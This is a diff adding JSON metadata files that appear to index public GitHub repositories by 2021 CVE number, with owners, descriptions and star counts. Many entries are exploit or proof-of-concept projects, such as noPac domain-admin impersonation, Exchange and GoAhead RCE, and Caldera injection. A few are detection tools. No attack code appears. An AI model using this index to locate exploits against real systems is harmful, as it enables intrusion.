+ "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42205.json b/2021/CVE-2021-42205.json new file mode 100644 index 0000000000..930a341753 --- /dev/null +++ b/2021/CVE-2021-42205.json @@ -0,0 +1,33 @@ +[ + { + "id": 584184646, + "name": "CVE-2021-42205", + "full_name": "gmh5225\/CVE-2021-42205", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2021-42205", + "description": "ELAN Miniport touchpad Windows driver before 24.21.51.2, as used in PC hardware from multiple manufacturers, allows local users to cause a system crash by sending a certain IOCTL request, because that request is handled twice. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-01T18:30:21Z", + "updated_at": "2023-02-20T12:38:17Z", + "pushed_at": "2022-12-28T11:30:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42230.json b/2021/CVE-2021-42230.json new file mode 100644 index 0000000000..26ac8405b3 --- /dev/null +++ b/2021/CVE-2021-42230.json @@ -0,0 +1,33 @@ +[ + { + "id": 433970810, + "name": "CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated", + "full_name": "TAPESH-TEAM\/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated", + "owner": { + "login": "TAPESH-TEAM", + "id": 83407483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83407483?v=4", + "html_url": "https:\/\/github.com\/TAPESH-TEAM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAPESH-TEAM\/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated", + "description": "Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)", + "fork": false, + "created_at": "2021-12-01T20:12:56Z", + "updated_at": "2024-08-12T20:18:31Z", + "pushed_at": "2022-04-16T23:46:59Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42237.json b/2021/CVE-2021-42237.json new file mode 100644 index 0000000000..7e9d94837b --- /dev/null +++ b/2021/CVE-2021-42237.json @@ -0,0 +1,95 @@ +[ + { + "id": 448464922, + "name": "CVE-2021-42237", + "full_name": "ItsIgnacioPortal\/CVE-2021-42237", + "owner": { + "login": "ItsIgnacioPortal", + "id": 46269721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46269721?v=4", + "html_url": "https:\/\/github.com\/ItsIgnacioPortal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ItsIgnacioPortal\/CVE-2021-42237", + "description": "An exploit\/PoC for CVE-2021-42237", + "fork": false, + "created_at": "2022-01-16T05:22:30Z", + "updated_at": "2024-11-08T18:59:07Z", + "pushed_at": "2022-01-16T05:40:17Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 509039142, + "name": "CVE-2021-42237-SiteCore-XP", + "full_name": "vesperp\/CVE-2021-42237-SiteCore-XP", + "owner": { + "login": "vesperp", + "id": 28191544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28191544?v=4", + "html_url": "https:\/\/github.com\/vesperp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vesperp\/CVE-2021-42237-SiteCore-XP", + "description": null, + "fork": false, + "created_at": "2022-06-30T10:44:23Z", + "updated_at": "2023-03-18T12:11:55Z", + "pushed_at": "2022-06-30T10:47:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 539971933, + "name": "SiteCore-RCE-Detection", + "full_name": "crankyyash\/SiteCore-RCE-Detection", + "owner": { + "login": "crankyyash", + "id": 61792333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61792333?v=4", + "html_url": "https:\/\/github.com\/crankyyash", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crankyyash\/SiteCore-RCE-Detection", + "description": "For detection of sitecore RCE - CVE-2021-42237", + "fork": false, + "created_at": "2022-09-22T12:32:11Z", + "updated_at": "2022-09-22T13:25:33Z", + "pushed_at": "2022-09-22T13:50:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42261.json b/2021/CVE-2021-42261.json new file mode 100644 index 0000000000..aab95b5d37 --- /dev/null +++ b/2021/CVE-2021-42261.json @@ -0,0 +1,33 @@ +[ + { + "id": 416296729, + "name": "CVE-2021-42261", + "full_name": "jet-pentest\/CVE-2021-42261", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-42261", + "description": "CVE-2021-42261", + "fork": false, + "created_at": "2021-10-12T10:50:01Z", + "updated_at": "2022-11-09T18:14:02Z", + "pushed_at": "2021-10-12T10:55:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42278.json b/2021/CVE-2021-42278.json new file mode 100644 index 0000000000..36ed39d8a4 --- /dev/null +++ b/2021/CVE-2021-42278.json @@ -0,0 +1,164 @@ +[ + { + "id": 437314230, + "name": "sam-the-admin", + "full_name": "safebuffer\/sam-the-admin", + "owner": { + "login": "safebuffer", + "id": 20618414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20618414?v=4", + "html_url": "https:\/\/github.com\/safebuffer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safebuffer\/sam-the-admin", + "description": "Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user ", + "fork": false, + "created_at": "2021-12-11T15:10:30Z", + "updated_at": "2024-11-24T23:34:57Z", + "pushed_at": "2022-07-10T22:23:13Z", + "stargazers_count": 987, + "watchers_count": 987, + "has_discussions": false, + "forks_count": 189, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "active-directory", + "exploitation", + "redteam", + "s4u2self" + ], + "visibility": "public", + "forks": 189, + "watchers": 987, + "score": 0, + "subscribers_count": 24 + }, + { + "id": 437829160, + "name": "noPac", + "full_name": "Ridter\/noPac", + "owner": { + "login": "Ridter", + "id": 6007471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6007471?v=4", + "html_url": "https:\/\/github.com\/Ridter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ridter\/noPac", + "description": "Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user ", + "fork": false, + "created_at": "2021-12-13T10:28:12Z", + "updated_at": "2024-11-27T16:39:48Z", + "pushed_at": "2023-01-29T03:31:27Z", + "stargazers_count": 806, + "watchers_count": 806, + "has_discussions": false, + "forks_count": 123, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 123, + "watchers": 806, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 437924403, + "name": "noPac", + "full_name": "waterrr\/noPac", + "owner": { + "login": "waterrr", + "id": 15225499, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15225499?v=4", + "html_url": "https:\/\/github.com\/waterrr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waterrr\/noPac", + "description": "Exploiting CVE-2021-42278 and CVE-2021-42287", + "fork": false, + "created_at": "2021-12-13T15:24:59Z", + "updated_at": "2024-03-05T09:34:17Z", + "pushed_at": "2021-12-13T15:40:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438053162, + "name": "Pachine", + "full_name": "ly4k\/Pachine", + "owner": { + "login": "ly4k", + "id": 53348818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4", + "html_url": "https:\/\/github.com\/ly4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly4k\/Pachine", + "description": "Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)", + "fork": false, + "created_at": "2021-12-13T23:15:05Z", + "updated_at": "2024-10-14T17:45:51Z", + "pushed_at": "2022-01-13T12:35:19Z", + "stargazers_count": 270, + "watchers_count": 270, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-42278" + ], + "visibility": "public", + "forks": 38, + "watchers": 270, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 442163896, + "name": "noPac-detection", + "full_name": "cybersecurityworks553\/noPac-detection", + "owner": { + "login": "cybersecurityworks553", + "id": 63910792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4", + "html_url": "https:\/\/github.com\/cybersecurityworks553", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybersecurityworks553\/noPac-detection", + "description": "Detection script for CVE-2021-42278 and CVE-2021-42287", + "fork": false, + "created_at": "2021-12-27T13:10:45Z", + "updated_at": "2022-03-30T06:49:25Z", + "pushed_at": "2021-12-27T13:27:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42287.json b/2021/CVE-2021-42287.json new file mode 100644 index 0000000000..78be0d25bd --- /dev/null +++ b/2021/CVE-2021-42287.json @@ -0,0 +1,157 @@ +[ + { + "id": 437370545, + "name": "noPac", + "full_name": "cube0x0\/noPac", + "owner": { + "login": "cube0x0", + "id": 39370848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39370848?v=4", + "html_url": "https:\/\/github.com\/cube0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cube0x0\/noPac", + "description": "CVE-2021-42287\/CVE-2021-42278 Scanner & Exploiter.", + "fork": false, + "created_at": "2021-12-11T19:27:30Z", + "updated_at": "2024-11-28T14:15:13Z", + "pushed_at": "2021-12-16T09:50:15Z", + "stargazers_count": 1342, + "watchers_count": 1342, + "has_discussions": false, + "forks_count": 322, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 322, + "watchers": 1342, + "score": 0, + "subscribers_count": 27 + }, + { + "id": 437991499, + "name": "Invoke-noPac", + "full_name": "ricardojba\/Invoke-noPac", + "owner": { + "login": "ricardojba", + "id": 4868297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4868297?v=4", + "html_url": "https:\/\/github.com\/ricardojba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ricardojba\/Invoke-noPac", + "description": ".Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploit noPac", + "fork": false, + "created_at": "2021-12-13T19:01:18Z", + "updated_at": "2024-09-19T02:12:47Z", + "pushed_at": "2023-02-16T10:45:19Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 60, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 445506092, + "name": "NoPacScan", + "full_name": "knightswd\/NoPacScan", + "owner": { + "login": "knightswd", + "id": 34396229, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34396229?v=4", + "html_url": "https:\/\/github.com\/knightswd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knightswd\/NoPacScan", + "description": "NoPacScan is a CVE-2021-42287\/CVE-2021-42278 Scanner,it scan for more domain controllers than other script", + "fork": false, + "created_at": "2022-01-07T11:59:55Z", + "updated_at": "2024-09-21T07:18:37Z", + "pushed_at": "2022-02-17T04:12:08Z", + "stargazers_count": 85, + "watchers_count": 85, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 85, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476650535, + "name": "Invoke-sAMSpoofing", + "full_name": "XiaoliChan\/Invoke-sAMSpoofing", + "owner": { + "login": "XiaoliChan", + "id": 30458572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30458572?v=4", + "html_url": "https:\/\/github.com\/XiaoliChan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaoliChan\/Invoke-sAMSpoofing", + "description": "CVE-2021-42287\/CVE-2021-42278 exploits in powershell", + "fork": false, + "created_at": "2022-04-01T09:10:14Z", + "updated_at": "2023-10-13T08:22:32Z", + "pushed_at": "2022-04-04T08:33:41Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 581054615, + "name": "noPac", + "full_name": "TryA9ain\/noPac", + "owner": { + "login": "TryA9ain", + "id": 51145610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51145610?v=4", + "html_url": "https:\/\/github.com\/TryA9ain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TryA9ain\/noPac", + "description": "CVE-2021-42287\/CVE-2021-42278 Exploiter", + "fork": false, + "created_at": "2022-12-22T06:39:07Z", + "updated_at": "2024-10-30T14:43:37Z", + "pushed_at": "2023-01-12T09:05:52Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42292.json b/2021/CVE-2021-42292.json new file mode 100644 index 0000000000..35a0387c61 --- /dev/null +++ b/2021/CVE-2021-42292.json @@ -0,0 +1,33 @@ +[ + { + "id": 426216342, + "name": "CVE-2021-42292", + "full_name": "corelight\/CVE-2021-42292", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2021-42292", + "description": "A Zeek package to detect CVE-2021-42292, a Microsoft Excel local privilege escalation exploit.", + "fork": false, + "created_at": "2021-11-09T12:14:45Z", + "updated_at": "2024-11-08T18:54:18Z", + "pushed_at": "2021-11-11T01:22:24Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42321.json b/2021/CVE-2021-42321.json new file mode 100644 index 0000000000..9f12a0e9fb --- /dev/null +++ b/2021/CVE-2021-42321.json @@ -0,0 +1,95 @@ +[ + { + "id": 430932973, + "name": "CVE-2021-42321", + "full_name": "DarkSprings\/CVE-2021-42321", + "owner": { + "login": "DarkSprings", + "id": 90366126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4", + "html_url": "https:\/\/github.com\/DarkSprings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-42321", + "description": "Microsoft Exchange Server Poc", + "fork": false, + "created_at": "2021-11-23T02:26:26Z", + "updated_at": "2024-08-12T20:18:18Z", + "pushed_at": "2021-11-23T02:33:47Z", + "stargazers_count": 84, + "watchers_count": 84, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 84, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 535520694, + "name": "cve-2021-42321", + "full_name": "xnyuq\/cve-2021-42321", + "owner": { + "login": "xnyuq", + "id": 44139189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44139189?v=4", + "html_url": "https:\/\/github.com\/xnyuq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xnyuq\/cve-2021-42321", + "description": null, + "fork": false, + "created_at": "2022-09-12T05:13:40Z", + "updated_at": "2022-09-12T05:13:40Z", + "pushed_at": "2022-09-12T05:15:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 547867056, + "name": "exch_CVE-2021-42321", + "full_name": "7BitsTeam\/exch_CVE-2021-42321", + "owner": { + "login": "7BitsTeam", + "id": 107024599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107024599?v=4", + "html_url": "https:\/\/github.com\/7BitsTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7BitsTeam\/exch_CVE-2021-42321", + "description": null, + "fork": false, + "created_at": "2022-10-08T13:00:23Z", + "updated_at": "2024-06-21T06:14:32Z", + "pushed_at": "2022-10-08T13:51:48Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42325.json b/2021/CVE-2021-42325.json new file mode 100644 index 0000000000..d3ec0097e2 --- /dev/null +++ b/2021/CVE-2021-42325.json @@ -0,0 +1,33 @@ +[ + { + "id": 434114286, + "name": "CVE-2021-42325-", + "full_name": "AK-blank\/CVE-2021-42325-", + "owner": { + "login": "AK-blank", + "id": 56591429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56591429?v=4", + "html_url": "https:\/\/github.com\/AK-blank", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AK-blank\/CVE-2021-42325-", + "description": "CVE-2021-42325 POC", + "fork": false, + "created_at": "2021-12-02T06:56:02Z", + "updated_at": "2021-12-03T00:25:24Z", + "pushed_at": "2021-12-02T06:58:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42327.json b/2021/CVE-2021-42327.json new file mode 100644 index 0000000000..7b2f424c01 --- /dev/null +++ b/2021/CVE-2021-42327.json @@ -0,0 +1,33 @@ +[ + { + "id": 422356561, + "name": "CVE-2021-42327", + "full_name": "docfate111\/CVE-2021-42327", + "owner": { + "login": "docfate111", + "id": 24590069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24590069?v=4", + "html_url": "https:\/\/github.com\/docfate111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/docfate111\/CVE-2021-42327", + "description": " kernel exploit POC for vulnerability i found in amd gpu driver", + "fork": false, + "created_at": "2021-10-28T21:10:29Z", + "updated_at": "2024-07-05T11:43:09Z", + "pushed_at": "2023-01-06T13:04:17Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42342.json b/2021/CVE-2021-42342.json new file mode 100644 index 0000000000..22db9d38f8 --- /dev/null +++ b/2021/CVE-2021-42342.json @@ -0,0 +1,64 @@ +[ + { + "id": 416209688, + "name": "goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-", + "full_name": "kimusan\/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-", + "owner": { + "login": "kimusan", + "id": 1150049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1150049?v=4", + "html_url": "https:\/\/github.com\/kimusan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kimusan\/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-", + "description": "A small PoC for the recent RCE found in the Goahead Webserver prior to version 5.1.5. ", + "fork": false, + "created_at": "2021-10-12T06:21:02Z", + "updated_at": "2022-11-09T18:14:02Z", + "pushed_at": "2021-10-18T20:56:31Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 711394073, + "name": "-zeroboo-Gohead-CVE-2021-42342-1", + "full_name": "ijh4723\/-zeroboo-Gohead-CVE-2021-42342-1", + "owner": { + "login": "ijh4723", + "id": 116932933, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116932933?v=4", + "html_url": "https:\/\/github.com\/ijh4723", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ijh4723\/-zeroboo-Gohead-CVE-2021-42342-1", + "description": null, + "fork": false, + "created_at": "2023-10-29T05:50:47Z", + "updated_at": "2023-10-29T05:50:47Z", + "pushed_at": "2023-10-29T05:50:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42362.json b/2021/CVE-2021-42362.json new file mode 100644 index 0000000000..ff974c6543 --- /dev/null +++ b/2021/CVE-2021-42362.json @@ -0,0 +1,33 @@ +[ + { + "id": 386012997, + "name": "CVE-2021-42362-PoC", + "full_name": "simonecris\/CVE-2021-42362-PoC", + "owner": { + "login": "simonecris", + "id": 63792651, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63792651?v=4", + "html_url": "https:\/\/github.com\/simonecris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/simonecris\/CVE-2021-42362-PoC", + "description": "Wordpress Most Popular Post plugin vuln", + "fork": false, + "created_at": "2021-07-14T16:55:50Z", + "updated_at": "2022-03-04T14:51:09Z", + "pushed_at": "2021-07-14T23:41:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42392.json b/2021/CVE-2021-42392.json new file mode 100644 index 0000000000..5e861b90b3 --- /dev/null +++ b/2021/CVE-2021-42392.json @@ -0,0 +1,33 @@ +[ + { + "id": 446140996, + "name": "CVE-2021-42392-Detect", + "full_name": "cybersecurityworks553\/CVE-2021-42392-Detect", + "owner": { + "login": "cybersecurityworks553", + "id": 63910792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4", + "html_url": "https:\/\/github.com\/cybersecurityworks553", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybersecurityworks553\/CVE-2021-42392-Detect", + "description": null, + "fork": false, + "created_at": "2022-01-09T16:23:16Z", + "updated_at": "2023-04-01T01:34:12Z", + "pushed_at": "2022-01-17T06:56:02Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42558.json b/2021/CVE-2021-42558.json new file mode 100644 index 0000000000..0918f006ee --- /dev/null +++ b/2021/CVE-2021-42558.json @@ -0,0 +1,39 @@ +[ + { + "id": 812766804, + "name": "CVE-2021-42558", + "full_name": "mbadanoiu\/CVE-2021-42558", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42558", + "description": "CVE-2021-42558: Multiple Cross-Site Scripting in MITRE Caldera", + "fork": false, + "created_at": "2024-06-09T20:20:46Z", + "updated_at": "2024-06-09T20:34:14Z", + "pushed_at": "2024-06-09T20:32:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cross-site-scripting", + "cve", + "cve-2021-42558", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42559.json b/2021/CVE-2021-42559.json new file mode 100644 index 0000000000..99277c5820 --- /dev/null +++ b/2021/CVE-2021-42559.json @@ -0,0 +1,40 @@ +[ + { + "id": 812777593, + "name": "CVE-2021-42559", + "full_name": "mbadanoiu\/CVE-2021-42559", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42559", + "description": "CVE-2021-42559: Command Injection via Configurations in MITRE Caldera", + "fork": false, + "created_at": "2024-06-09T21:07:16Z", + "updated_at": "2024-06-09T21:14:20Z", + "pushed_at": "2024-06-09T21:13:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2021-42559", + "cves", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42560.json b/2021/CVE-2021-42560.json new file mode 100644 index 0000000000..e83f5b60e6 --- /dev/null +++ b/2021/CVE-2021-42560.json @@ -0,0 +1,40 @@ +[ + { + "id": 812783452, + "name": "CVE-2021-42560", + "full_name": "mbadanoiu\/CVE-2021-42560", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42560", + "description": "CVE-2021-42560: Unsafe XML Parsing in MITRE Caldera", + "fork": false, + "created_at": "2024-06-09T21:33:07Z", + "updated_at": "2024-06-09T21:42:54Z", + "pushed_at": "2024-06-09T21:40:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2021-42560", + "cves", + "xxe" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42561.json b/2021/CVE-2021-42561.json new file mode 100644 index 0000000000..cfe0efb508 --- /dev/null +++ b/2021/CVE-2021-42561.json @@ -0,0 +1,40 @@ +[ + { + "id": 812797307, + "name": "CVE-2021-42561", + "full_name": "mbadanoiu\/CVE-2021-42561", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + 